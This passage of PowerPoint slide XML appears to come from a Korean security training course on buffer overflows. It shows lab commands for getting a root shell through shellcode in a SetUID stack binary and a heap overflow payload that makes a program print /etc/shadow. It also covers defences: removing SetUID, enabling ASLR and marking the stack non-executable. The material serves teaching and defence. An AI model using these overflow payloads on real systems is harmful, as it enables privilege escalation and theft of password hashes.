              <a:t>/stack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일을 실행하여 루트 쉘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./stack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9CFF3B-8277-4780-B382-55D6783068EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="552010" y="531791"/>
          <a:ext cx="5029640" cy="4023880"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="5029640">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3675159690"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="2678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84636"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="3756073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마지막으로 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>쉘코드를</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> 페이로드 마지막 부분에 복사해 넣는다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memcpy (buffer + sizeof (buffer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sizeof (shellcode), shellcode, sizeof (shellcode))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025249"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="_x564957368">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{507E7344-3FC1-430B-AB6B-CAD87F5EA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95" y="1396921"/>
            <a:ext cx="2277247" cy="30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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE841136-D24E-4F8C-98EB-335D1FE02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" t="2082"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="514350" y="5137297"/>
            <a:ext cx="4903081" cy="590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AC1FD6-2A5F-46CF-AE10-D0CB522CC28D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루트 쉘을 획득한 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>상태에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>acheck </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>입력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acheck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C04FE9-5AA5-45D2-917E-75E7A4694F3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62520C4-69C6-43DC-B25D-3085BBC6C4AB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61F6CE-640E-4B4A-B452-4CB037E1E0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B3E00A10-1226-4A04-B94C-84962153F97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036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보안 아이콘 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6642C97-AE41-486C-BE08-8D12FAF98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/Training/Unit/Sys/9</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 9. BOF -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쉘코드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실행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/stack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통해 쉘 코드가 실행되지 않도록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대응하시오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ASLR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sysctl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 kernel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randomize_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space=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실행 방지 설정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execstack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4" descr="목표 아이콘 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{139A787F-55D9-4280-A8E7-48BDE3B1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C3DFF4-2FD7-4BB3-B403-C968BA8BCA13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쉘코드를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및 실행할 수 있다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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공격에 대응할 수 있다</a:t>
            </a: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5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D80CE4A-C2E9-4560-8E50-EB848B2EAE7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3017B1-DBDF-418B-BC4C-BD9FA0CFACFC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8" descr="cent os 아이콘 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0DE2446-C02B-47FA-9538-513B519A1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4D0FFD-0653-4F8F-8056-CFE9FBC86D85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5.11, 32-bit)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6B0DA0-CF87-4217-BA6E-21FF424C1CD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50A4C0-C1BB-4488-87A0-07928015F51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8F201F-2885-494C-B5EA-7C4A69EAB1A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B5D75FCD-6725-40D7-A146-4937F85BA7B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146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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/stack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설정됨을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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/sec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/stack*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stack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>파일에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>SetUID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>설정 해제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u-s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/sec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/stack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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/sec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/stack*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ASLR </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>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sysctl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>w kernel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>randomize_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>va</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>space=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ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>스택 실행 방지 설정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execstack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>–c </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/sec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/stack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execstack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>–q </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/sec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/stack</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 84">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C7DBDD6-CBB4-41A5-9432-8FEB5F7C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833966"/>
            <a:ext cx="4727194" cy="5410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86">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5661EAAE-E448-42C9-A743-DC8DACC6B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1" r="2302" b="19042"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="483152" y="2149362"/>
            <a:ext cx="4958142" cy="64152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A759F0-00FE-4ADB-B599-D6E8C0B1728C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="483152" y="2880142"/>
          <a:ext cx="4932807" cy="2443353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16327748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18803"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="20122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SetUID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해제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실행되기는 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권한이 아닌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실행한 계정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그림의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권한을 가지는 쉘이 나타난다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16622"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="53249" name="_x1658446056">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3A57FB5-7F34-409E-850A-FA077295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9" y="3671797"/>
            <a:ext cx="477996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8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A6A4311-731E-4CA8-BFC4-6D2BBC40C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52" y="5773673"/>
            <a:ext cx="4983480" cy="5562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78BD65-C113-4787-9C38-CB1A8A9FEA44}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6282989" y="470112"/>
          <a:ext cx="4932807" cy="317417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95635228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56180"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="26866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ASLR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실행하면 실행시마다 주소가 변경되어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실행되지 않는다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공격자는 스크립트 등을 사용하여 성공할 때까지 반복함으로써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실행시킬 수도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49480"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="53251" name="_x617035992">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03B9E9A5-A524-47B8-B9D1-99DEDA946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325"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6384472" y="1719795"/>
            <a:ext cx="4742542" cy="176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0">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CE4F803-2A1D-408C-BE49-1E5975DE8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989" y="4521813"/>
            <a:ext cx="4503420" cy="54102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FC0D6E-5653-432A-B10A-3E0EDD8A38A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257331A-9C23-4EF9-BF76-BD7F10A19E7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E410D5-8201-4E91-8981-B9EA3BFD0B7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F274F48-80C7-42DF-A2A9-14023AB1B65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52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C4553F-CF47-4982-BAED-66DAB834C2FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="620276" y="498663"/>
          <a:ext cx="4932807" cy="293033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8629174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16968"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="25204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스택 실행 방지 설정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실행하면 스택 내에 존재하는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자체의 실행이 불가능하게 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16208"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="56321" name="_x1658344864">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72AC8636-B837-4BB9-B28F-49DD5F96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0" y="1311503"/>
            <a:ext cx="4770438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E17C4A-3B31-4DDC-AF8F-C53104642EDB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4EFB41-A839-4942-B067-E5C42D9F4F1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795B63-DDAA-4482-B875-5A0C980BA18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690D8B-DF94-4BFB-9CDD-FAAEFD11259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화살표: 오른쪽 11">
              <a:hlinkClick r:id="" action="ppaction://noaction"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C8F88F4-67B1-4644-816D-F049F6B7454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46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/Training/Unit/Sys/10</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 10. BOF -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힙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존재하는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/shadow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내용을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BOF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BOF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취약점에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EFB03D-34B9-4EE6-85B6-79AF701BA0F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0C0A1CA-A354-4356-922E-F509B5745B6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83B7B-F873-4C64-A599-22B2D19FCB7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7C74A80-9583-4D92-800C-344EF6D87B8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88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/sec/heap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ls –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>l heap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/sec/heap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vim </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/sec/heap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>.c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/sec/goodfile </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일 내용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cat goodfile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/>
              <a:t>/sec/heap </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일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/sec/heap </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>AAAA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username </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>블록과 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>filename </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>블록 간의 거리가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x70(=112) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>바이트임을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5" name="Picture 92">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{571A0F24-991F-415E-A73C-B4EAAC47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0" y="1308062"/>
            <a:ext cx="3931920" cy="6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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E16244EA-4DD3-4DB4-82AB-E12B2160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50" y="2572320"/>
            <a:ext cx="4954143" cy="275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6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CEE197C-F394-412F-8A5A-427406107D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" t="7386"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="505350" y="5778500"/>
            <a:ext cx="3059320" cy="50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98">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE075564-BEE4-4DC3-AF46-CA3441663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7" t="2533" b="1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6303893" y="852446"/>
            <a:ext cx="3729355" cy="12625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2514E9-35C9-4437-B2C6-2C1F069FC0E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6303893" y="2416397"/>
          <a:ext cx="4932807" cy="268649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58839612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12301"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="21920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14587"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="57345" name="_x570528760">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D34F5E5-1CDA-4753-B23F-F4B742DB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27" y="3007517"/>
            <a:ext cx="4783138" cy="18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8EF467-838B-401E-8C44-EF9C0969A91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887E6CE-FA27-4E84-A8B5-629D20E6744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B57CA6-41C8-4B86-8288-641600675A0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7E42FEDF-AC64-48DC-8741-0850E5A3D2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20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 err="1"/>
              <a:t>힙</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>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취약점을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>이용하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>filename</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>수정할 수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/sec/heap </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>$(python -c 'print "A"*112+"B"') &gt; 1.txt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ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>위의 실행 결과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cat 1.txt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B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>라는 파일을 열 수 없었음을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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>) 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파일 내용이 출력되도록 공격 수행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/sec/heap </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>$(python -c 'print "A"*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>112+"/etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/shadow"') &gt; 2.txt</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 101">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD377966-9EB2-46A2-8812-AD29643EC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" t="323" r="721" b="158"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="504826" y="862012"/>
            <a:ext cx="4852987" cy="27051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9AB127-0D1E-49DE-AA80-E2C09252F5FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="504826" y="3632427"/>
          <a:ext cx="4932807" cy="278427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563084074"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="2552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91167"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="25290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buf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 시작 주소로부터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문자가 복사되며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buf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버퍼의 시작 주소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복사된다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68446"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="59393" name="_x603817952">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{266AA15A-B8BA-445A-9A33-16961264F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7" y="4473906"/>
            <a:ext cx="4593352" cy="180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3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76E22925-E979-45D6-8626-2DA803E7A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" t="1826" r="101" b="451"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6311741" y="862012"/>
            <a:ext cx="49053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5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28A9FE55-DBD5-4F0D-A63F-B2351D7BB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741" y="2811778"/>
            <a:ext cx="4934204" cy="2746629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DC8520-7C1E-43E7-84E9-467C287FDD7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3523E35-2AE8-4E01-8F25-6D62F827C3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5DA178-FFF2-4F20-95AD-779D82BC8AD3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25D482AD-1BDB-4B00-840E-53F5B98BEC9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762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8) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>위의 공격 결과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cat 2.txt</a:t>
            </a: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321A60-9A8B-4DCF-B6BE-E0B5E85C5327}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="513016" y="490569"/>
          <a:ext cx="5049584" cy="2686495"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="5049584">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3417638965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45710"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="2203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09503"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="60417" name="_x609432040">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8A00DFC-BC0A-404C-A5D1-E832A2A5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10" y="1092518"/>
            <a:ext cx="4811713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7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{696B1E8A-1EFD-4FFC-BD3E-A7127DA4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6" y="3608229"/>
            <a:ext cx="4992116" cy="27592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C682B9-F1E2-456F-BB10-FF556080591D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acheck </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>및 파일명 입력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acheck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/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>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파일 내용이 출력된 파일 이름 입력</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>위의 예제에서는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>2.txt)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5316DD-2CD5-490B-83B5-C7C01B0202D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99825A1-062A-40CE-B920-CD7749C7A75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1437C5-6CDA-4FB6-8C80-D0BAD3A08F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2EADCCBE-7BBA-4A27-B14F-CB5D54F4E41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4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0AA773C-14EF-4A37-BBC0-6F886F26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" y="1921912"/>
            <a:ext cx="5285154" cy="39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F4890CE-C619-4B37-BCE4-BE23F2D3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27" y="1921912"/>
            <a:ext cx="5517933" cy="411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70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보안 아이콘 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71EB15F0-8F52-4084-8228-4234399B1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/Training/Unit/Sys/10</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 10. BOF –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힙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/sec/heap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오버플로우가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발생하더라도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권한이 없는 파일의 내용이 출력되지 않도록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SetUID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u-s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4" descr="목표 아이콘 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ACA32BEB-9045-401B-B976-A8DE580F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C69DC5-6D46-4110-B092-F87162F11C2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BOF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BOF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취약점에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50E706-7320-4890-B2A5-9F511E31CF36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F75AFA-6CA9-432C-B149-D4CF8BED7C7C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8" descr="cent os 아이콘 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F042198-8D3B-42BA-9AB0-F321EFE2D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27DCE4-1233-4F8B-B02D-73786CA1D8E6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414104-8B9C-4CB0-900B-F84D0564BA2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1781417-D03F-4E91-B9D9-1AF2D709571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087AE6-366E-41AB-BDDA-0EE45619FF93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78351B86-FFEB-4E07-95F8-5CDDE591EF0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417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/sec/heap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heap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/sec/heap </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>파일에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>SetUID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>설정 해제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u-s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/sec/heap 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heap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64827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5" name="Picture 109">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C217BE02-C249-4B5F-B814-9FDE58ECB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2896"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="530224" y="1327150"/>
            <a:ext cx="3932555" cy="69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11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A268674-ACB5-47FC-8FAB-D5A054A14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" t="7026"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="530224" y="2770129"/>
